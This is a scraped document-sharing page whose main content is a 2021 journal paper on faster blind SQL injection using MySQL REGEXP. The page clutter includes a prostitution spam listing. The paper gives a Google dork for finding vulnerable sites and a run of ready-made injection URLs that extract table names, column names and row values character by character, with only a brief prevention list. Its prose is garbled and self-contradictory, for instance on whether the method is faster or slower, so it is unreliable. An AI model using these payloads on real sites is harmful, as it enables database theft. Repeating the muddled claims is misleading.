Sustainable Energy by Paul A. Adekunte | Matthew N. O. Sadiku | Janet O. Sadiku
Sustainable Energy by Paul A. Adekunte | Matthew N. O. Sadiku | Janet O. SadikuSustainable Energy by Paul A. Adekunte | Matthew N. O. Sadiku | Janet O. Sadiku
Sustainable Energy by Paul A. Adekunte | Matthew N. O. Sadiku | Janet O. Sadiku
 
Concepts for Sudan Survey Act Implementations Executive Regulations and Stand...
Concepts for Sudan Survey Act Implementations Executive Regulations and Stand...Concepts for Sudan Survey Act Implementations Executive Regulations and Stand...
Concepts for Sudan Survey Act Implementations Executive Regulations and Stand...
 
Towards the Implementation of the Sudan Interpolated Geoid Model Khartoum Sta...
Towards the Implementation of the Sudan Interpolated Geoid Model Khartoum Sta...Towards the Implementation of the Sudan Interpolated Geoid Model Khartoum Sta...
Towards the Implementation of the Sudan Interpolated Geoid Model Khartoum Sta...
 
Activating Geospatial Information for Sudans Sustainable Investment Map
Activating Geospatial Information for Sudans Sustainable Investment MapActivating Geospatial Information for Sudans Sustainable Investment Map
Activating Geospatial Information for Sudans Sustainable Investment Map
 
Educational Unity Embracing Diversity for a Stronger Society
Educational Unity Embracing Diversity for a Stronger SocietyEducational Unity Embracing Diversity for a Stronger Society
Educational Unity Embracing Diversity for a Stronger Society
 
Integration of Indian Indigenous Knowledge System in Management Prospects and...
Integration of Indian Indigenous Knowledge System in Management Prospects and...Integration of Indian Indigenous Knowledge System in Management Prospects and...
Integration of Indian Indigenous Knowledge System in Management Prospects and...
 
DeepMask Transforming Face Mask Identification for Better Pandemic Control in...
DeepMask Transforming Face Mask Identification for Better Pandemic Control in...DeepMask Transforming Face Mask Identification for Better Pandemic Control in...
DeepMask Transforming Face Mask Identification for Better Pandemic Control in...
 
Streamlining Data Collection eCRF Design and Machine Learning
Streamlining Data Collection eCRF Design and Machine LearningStreamlining Data Collection eCRF Design and Machine Learning
Streamlining Data Collection eCRF Design and Machine Learning
 

Recently uploaded

PSYCHIATRIC History collection FORMAT.pptx
PSYCHIATRIC   History collection FORMAT.pptxPSYCHIATRIC   History collection FORMAT.pptx
PSYCHIATRIC History collection FORMAT.pptxPoojaSen20
 
Solving Puzzles Benefits Everyone (English).pptx
Solving Puzzles Benefits Everyone (English).pptxSolving Puzzles Benefits Everyone (English).pptx
Solving Puzzles Benefits Everyone (English).pptxOH TEIK BIN
 
Introduction to ArtificiaI Intelligence in Higher Education
Introduction to ArtificiaI Intelligence in Higher EducationIntroduction to ArtificiaI Intelligence in Higher Education
Introduction to ArtificiaI Intelligence in Higher Educationpboyjonauth
 
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...EduSkills OECD
 
APM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAPM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAssociation for Project Management
 
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Sapana Sha
 
Arihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdfArihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdfchloefrazer622
 
“Oh GOSH! Reflecting on Hackteria's Collaborative Practices in a Global Do-It...
“Oh GOSH! Reflecting on Hackteria's Collaborative Practices in a Global Do-It...“Oh GOSH! Reflecting on Hackteria's Collaborative Practices in a Global Do-It...
“Oh GOSH! Reflecting on Hackteria's Collaborative Practices in a Global Do-It...Marc Dusseiller Dusjagr
 
Concept of Vouching. B.Com(Hons) /B.Compdf
Concept of Vouching. B.Com(Hons) /B.CompdfConcept of Vouching. B.Com(Hons) /B.Compdf
Concept of Vouching. B.Com(Hons) /B.CompdfUmakantAnnand
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Krashi Coaching
 
Employee wellbeing at the workplace.pptx
Employee wellbeing at the workplace.pptxEmployee wellbeing at the workplace.pptx
Employee wellbeing at the workplace.pptxNirmalaLoungPoorunde1
 
Measures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and ModeMeasures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and ModeThiyagu K
 
URLs and Routing in the Odoo 17 Website App
URLs and Routing in the Odoo 17 Website AppURLs and Routing in the Odoo 17 Website App
URLs and Routing in the Odoo 17 Website AppCeline George
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxheathfieldcps1
 
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptxPOINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptxSayali Powar
 
Separation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and ActinidesSeparation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and ActinidesFatimaKhan178732
 
CARE OF CHILD IN INCUBATOR..........pptx
CARE OF CHILD IN INCUBATOR..........pptxCARE OF CHILD IN INCUBATOR..........pptx
CARE OF CHILD IN INCUBATOR..........pptxGaneshChakor2
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introductionMaksud Ahmed
 
Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)eniolaolutunde
 

Recently uploaded (20)

PSYCHIATRIC History collection FORMAT.pptx
PSYCHIATRIC   History collection FORMAT.pptxPSYCHIATRIC   History collection FORMAT.pptx
PSYCHIATRIC History collection FORMAT.pptx
 
Solving Puzzles Benefits Everyone (English).pptx
Solving Puzzles Benefits Everyone (English).pptxSolving Puzzles Benefits Everyone (English).pptx
Solving Puzzles Benefits Everyone (English).pptx
 
Introduction to ArtificiaI Intelligence in Higher Education
Introduction to ArtificiaI Intelligence in Higher EducationIntroduction to ArtificiaI Intelligence in Higher Education
Introduction to ArtificiaI Intelligence in Higher Education
 
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
 
APM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAPM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across Sectors
 
TataKelola dan KamSiber Kecerdasan Buatan v022.pdf
TataKelola dan KamSiber Kecerdasan Buatan v022.pdfTataKelola dan KamSiber Kecerdasan Buatan v022.pdf
TataKelola dan KamSiber Kecerdasan Buatan v022.pdf
 
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
 
Arihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdfArihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdf
 
“Oh GOSH! Reflecting on Hackteria's Collaborative Practices in a Global Do-It...
“Oh GOSH! Reflecting on Hackteria's Collaborative Practices in a Global Do-It...“Oh GOSH! Reflecting on Hackteria's Collaborative Practices in a Global Do-It...
“Oh GOSH! Reflecting on Hackteria's Collaborative Practices in a Global Do-It...
 
Concept of Vouching. B.Com(Hons) /B.Compdf
Concept of Vouching. B.Com(Hons) /B.CompdfConcept of Vouching. B.Com(Hons) /B.Compdf
Concept of Vouching. B.Com(Hons) /B.Compdf
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
 
Employee wellbeing at the workplace.pptx
Employee wellbeing at the workplace.pptxEmployee wellbeing at the workplace.pptx
Employee wellbeing at the workplace.pptx
 
Measures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and ModeMeasures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and Mode
 
URLs and Routing in the Odoo 17 Website App
URLs and Routing in the Odoo 17 Website AppURLs and Routing in the Odoo 17 Website App
URLs and Routing in the Odoo 17 Website App
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptx
 
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptxPOINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
 
Separation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and ActinidesSeparation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and Actinides
 
CARE OF CHILD IN INCUBATOR..........pptx
CARE OF CHILD IN INCUBATOR..........pptxCARE OF CHILD IN INCUBATOR..........pptx
CARE OF CHILD IN INCUBATOR..........pptx
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introduction
 
Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)
 

Appreciative Advanced Blind SQLI Attack

  • 1. International Journal of Trend in Scientific Research and Development (IJTSRD) Volume 5 Issue 5, July-August 2021 Available Online: www.ijtsrd.com e-ISSN: 2456 – 6470 @ IJTSRD | Unique Paper ID – IJTSRD46336 | Volume – 5 | Issue – 5 | Jul-Aug 2021 Page 2353 Appreciative Advanced Blind SQLI Attack Megha Yadav1 , Ms. Shalini Bhadola2 , Ms. Kirti Bhatia2 , Rohini Sharma3 1 Master of Technology in Computer Science, MDU, Rohtak, Haryana, India 2 Depatrment of Computer Science & Engineering, Sat kabir Institute of Technology and Management, MDU, Rohtak, Haryana, India 3 Assistant Professor, Government College for Women Rohtak, Haryana, India ABSTRACT We are no longer faced with a new threats to our web applications from SQL injection attacks, and the number of attacks is steadily declining as users become more aware of the risks. Almost all web applications are still vulnerable to advanced SQL injection attacks. A regular expression-based query structure in this paper describes a new method for transforming blind SQL injection into a more effective and faster technique than traditional blind SQL injection. When we understand the cause of an attack, we are able to find more effective treatment. KEYWORDS: Enhanced SQL Injection, Blind SQL Injection, Regular expressions attack, Input validation How to cite this paper: Megha Yadav | Ms. Shalini Bhadola | Ms. Kirti Bhatia | Rohini Sharma "Appreciative Advanced Blind SQLI Attack" Published in International Journal of Trend in Scientific Research and Development (ijtsrd), ISSN: 2456- 6470, Volume-5 | Issue-5, August 2021, pp.2353- 2356, URL: www.ijtsrd.com/papers/ijtsrd46336.pdf Copyright © 2021 by author (s) and International Journal of Trend in Scientific Research and Development Journal. This is an Open Access article distributed under the terms of the Creative Commons Attribution License (CC BY 4.0) (http://creativecommons.org/licenses/by/4.0) INTRODUCTION Our first discussion has been on simple SQL injections. When databases started flourishing on the web, SQL injections followed. A database attack is described as one that accesses the database through unauthorized means such as URLs or input methods in order to show or connect the data to a client. Therefore, it is primarily due to error coding by developers who failed to parameterize the input data or to implement a security check and have accepted input data from clients that was subject to modification, extraction, or deletion. These attackers use advance Google search to find SQLI-vulnerable websites to launch attacks. If any error arises as a result of this modification, the website is considered vulnerable during vulnerability tests. Attackers pass extra data or alter current URLs to make the backend query different. We are able to conduct blind SQLinjection attacks on applications that do not return error messages. 1. Finding vulnerable websites: Searching SQLI vulnerable websites, which can be difficult when we choose one specific website to attack or find a number of websites all at once, can be done very well with Google dorks A few examples: We enter the following query in the Google search box site:.com inurl:.php?id= All websites that are requesting data from the database using ID will be listed here and satisfying our criteria. To retrieve data from a database, the WHERE clause of web applications uses client-supplied input to query SQL databases. You can determine if the application is susceptible to SQL injection, a SQL statement with multiple conditions and subsequent evaluation of the application's output. We determine the type of attack based on finding vulnerabilities. Suppose you want to access a company's products via this URL: IJTSRD46336
  • 2. International Journal of Trend in Scientific Research and Development @ www.ijtsrd.com eISSN: 2456-6470 @ IJTSRD | Unique Paper ID – IJTSRD46336 | Volume – 5 | Issue – 5 | Jul-Aug 2021 Page 2354 http://www.abc.com/xyz.php?productID=35 The developers would, for example, use this SQL query to fetch information from the website SELECT * from products where product id=35 The products will be retrieved from the database and displayed on the site: Inject a true condition into the WHERE clause to determine if the application is vulnerable descriptor injections. The URL is requested if http://www.a.com/xyz.php?news=35and5=5— You will need to submit a new query The news where * appears news id=35 and 5=5 so, This shows a vulnerability to SQL injection if the same page is returned from the query. SQL code is interpreted from input provided by the user. If the request is made to a secure application, the value "5 and 1=1" will cause a type mismatch, so the application will reject the request. There was no press release on the server. 2. Improved blind SQL injection using regular expression Expending REGEXP, our search norms are binary, since it gives options from A-Z, so we keep searching until we do not find the exact word. So the attack is a mix between guessing and binary searching. Our binary search algorithm reduces search time by half compared to regular blind attacks, or we can say that we are saving time immediately when the algorithm reduces the searches. 2.1. REGEXP attack's methodology This is a method of extracting information from databases fast. The simplicity of its methodology allows us to save a lot of time and bandwidth. Our REGEXP (My SQL) or LIKE (MSSQL) functions match a range of numbers, characters, and special characters. The REGEXP operator is used to match patterns with regular expressions. For complex searches, this feature offers a powerful method of specifying patterns. So basically, this attack exploits a pattern match method in My SQL, or if we were using MSSQL we would be able to use the LIKE function, but for complex data searches REGEXP is the more powerful function. A quick example would be helpful. 2.2. Finding if tables are present in database Initially we check if the database contains tables or not by employing the subsequent blind attack if it does not change the web page then it has tables, the error output will indicate whether it has many tables; should it appear to be without tables, other sorts of SQL assaults can be studied using the error provided. INFORMATION_SCHEMA is a set of views that permit us to extract metadata from objects within a database, and therefore can be used to guess and search user-created tables in a database. http://www.abc.com/daily/content.php?id=85019 and 1=(select 1 from information_schema. table_constraints limit 0,1) -- The TABLE_CONSTRAINTS has been used along with INFORMATION_SCHEMA to restrict data access by providing only user-made tables so that the attacker won't have many default tables to access. The next step is to look for these available tables in the database and then test them. 2.3. Extracting table name Following that, we use guess method to find table names, for instance if we believe there will be a database called USER, then initially we use U and others in regexprange to determine the precise name of the table. Depending on the attack type, the attacker may guess the name of the table containing a username or password indicating which table to access. http://www.abc.com/daily/content.php?id=85019 and 1=(select 1 from information_schema.table_constraints where table_name regexp ‘^[a-z]’ limit 0,1) – A-Z range was used to search for table name in previous query, our table name would then begin if the test results are true. By using an alphabet and separating the range into two sets, A-M and N-Z, we keep reiterating the search query until we get the first letter of our table name even if we have trouble finding the letter. In this example, we identifythat the first complemented record in the database starts with a char between [a -> z]; the following code demonstrates how to retrieve the full name of the record [1]: http://www.abc.com/daily/content.php?id=85019 and 1=(select 1 from information_schema.table_constraints where table_name regexp ‘^u[a-z]’ limit 0,1) – When we find first character then we are going to follow the same way to find subsequent characters so if next query returns true we are going to try it. http://www.abc.com/daily/content.php?id=85019 and 1=(select 1 from information_schema.table_constraints where table_name regexp ‘^us[a-z]’ limit 0,1) – Similarly we follow till we don’t get FALSE
  • 3. International Journal of Trend in Scientific Research and Development @ www.ijtsrd.com eISSN: 2456-6470 @ IJTSRD | Unique Paper ID – IJTSRD46336 | Volume – 5 | Issue – 5 | Jul-Aug 2021 Page 2355 http://www.abc.com/daily/content.php?id=85019 and 1=(select 1 from information_schema.table_constraints where table_name regexp ‘^users[a-z]’ limit 0,1) – We extracted the table name USERS from above's query as there is no table named USERS. We can simply use the search method instead of the guess and search method, where the REGEXP range keeps fading in and out until not a word is found, we can use the truncated version. 2.4. Extracting Column name The following query results in the column names for our table after we have guessed the table name and searched for it www.abc.com/daily/content.php?id=85019 and 1=(select 1 from information_schema.columns where table_name=access and column_name regexp '^[a-z]' limit 0,1) – So we can either predict and explore or use REGEXP to do a straight search. We solely used search without making any guesses, thus after the first real query, we separated it from the centre and continued looking for the exact term, just like our table guesses. www.abc.com/daily/content.php?id=85019 and 1=(select 1 from information_schema.columns where table_name=access and column_name regexp '^[a-m]' limit 0,1) – If the result of the above query comes true we divide it further www.abc.com/daily/content.php?id=85019 and 1=(select 1 from information_schema.columns where table_name=access and column_name regexp '^[a-f]' limit 0,1) – True www.abc.com/daily/content.php?id=85019 and 1=(select 1 from information_schema.columns where table_name=access and column_name regexp '^[a-c]' limit 0,1) – False www.abc.com/daily/content.php?id=85019 and 1=(select 1 from information_schema.columns where table_name=access and column_name regexp '^[d-f]' limit 0,1) – True www.abc.com/daily/content.php?id=85019 and 1=(select 1 from information_schema.columns where table_name=access and column_name regexp '^[f]' limit 0,1) – True Having found the first letter'f', the same can be done with other letters, but by changing our limit, we can determine if another table starts with the same letter. www.abc.com/daily/content.php?id=85019 and 1=(select 1 from information_schema.columns where table_name=access and column_name regexp '^[f]' limit 1,1) – False There are no more tables that start with 'f'. From now on we must change the regular expression like this: '^f[a-z]' -> '^fi[a-z]' -> '^fir[a-z]' -> '^first[a-z]' -> FALSE Our table name, which we will use thereafter, is what we get when we get FALSE in the end. After finding the first character, the expression is repeated several times in order to obtain the complete table name. 2.5. Extracting value from database While following the same method, we now have access to the name of the column and the ability, making it easier to extract values from our columns now that we have all the basic information about our database. www.abc.com/daily/content.php?id=85019 and 1=(select 1 from users where First regexp '^[a-z]' limit 0,1) – True www.abc.com/daily/content.php?id=85019 and 1=(select 1 from users where First regexp '^[a-m]' limit 0,1) -- False www.abc.com/daily/content.php?id=85019 and 1=(select 1 from users where First regexp '^[n-z]' limit 0,1) -- True www.abc.com/daily/content.php?id=85019 and 1=(select 1 from users where First regexp '^[t-z]' limit 0,1) -- True Since LIMIT and REGEXP are not present in MSSQL, this makes attacking MSSQL more complicated. TOP and LIKE are the ways to bypass it. [1] 3. Precautions When it comes to SQL attacks, prevention is better than cure. As we know, it is developer's errors or ignorance in input validation that leads to most of
  • 4. International Journal of Trend in Scientific Research and Development @ www.ijtsrd.com eISSN: 2456-6470 @ IJTSRD | Unique Paper ID – IJTSRD46336 | Volume – 5 | Issue – 5 | Jul-Aug 2021 Page 2356 SQLI attacks. As for advanced SQLI attack security, a few precautions are critical for our web applications. 1. Validation of input before it is processed: This is an input filtration method for detecting or verifying unauthorized entries before they are processed by the application. 2. Checking Input Type: This step can be easily accomplished by developers, but it prevents input types from being entered incorrectly or maliciously into our input boxes. [2] 3. Escape database Meta characters: Database Meta characters can be escaped by prepending or preceding them. [2] 4. Making sure the query string and headers are correctly passed to our database. [2] 5. Parameterized Queries: By using parameterized queries, you can protect yourself from SQL injections. 4. Evaluation of normal Vs REGEXP base blind SQLI attack IHTEAM's paper makes it very clear that MD5 is the case. An SQL injection blindly exports a 32-character hash. In an optimistic event, Regexp and normal blind should perform 32 queries despite the fact that the number of characters is only 16 (1234567890abcdef). [1] Compared to normal SQLI attacks, Regexp Blind SQLI Attack needs one hundred times more time to complete[1] as opposed to standard SQLI attacks. By contrast, the advanced SQLI attack will prove much quicker than the ordinary attacks when compared to the standard ones. As developers are in the early stages of developing their website, they usually focus on simple security measures such as blind SQLI with regexp when targeting web addresses with no time limit. It may be difficult, however, for attackers to perform blind SQLI if they are searching for mass attacks. 5. Conclusion We found that by comparing REGEXP base to blind SQL that this new method works well for hacking. Because advanced attacks such as SQLI don't care for hidden database errors, we have to build database files that are safer and more secure. According to other references, MORE_SCHEMA consistently approached more concise results with a more straightforward approach than the defaulting INFORMATION_SCHEMA method. References [1] Blind Sql Injection with Regular Expressions Attack: IHTEAM [2] Full MSSQL Injection PWNage: ZeQ3uL && JabAv0C cwh.citec.us [3] Guimarães, B. D., "Advanced SQL Injection to Operating System Full Control," Black Hat Europe, white paper, April 2009 [4] Sagar Joshi (2005): SQL injection attack and defense: Web Application and SQL injection. http://www.securitydocs.com/library/3587 [5] William G.J. Halfond, Jeremy Viegas, and Alessandro Orso (2006): A Classification of SQL Injection Attacks and Countermeasures. IEEE Conference. [6] "SQL Injection Are Your Web Applications Vulnerable?". SPI Dynamics. 2002. [7] http://www.spidynamics.com/papers/SQLInject ionWhitePaper.pdf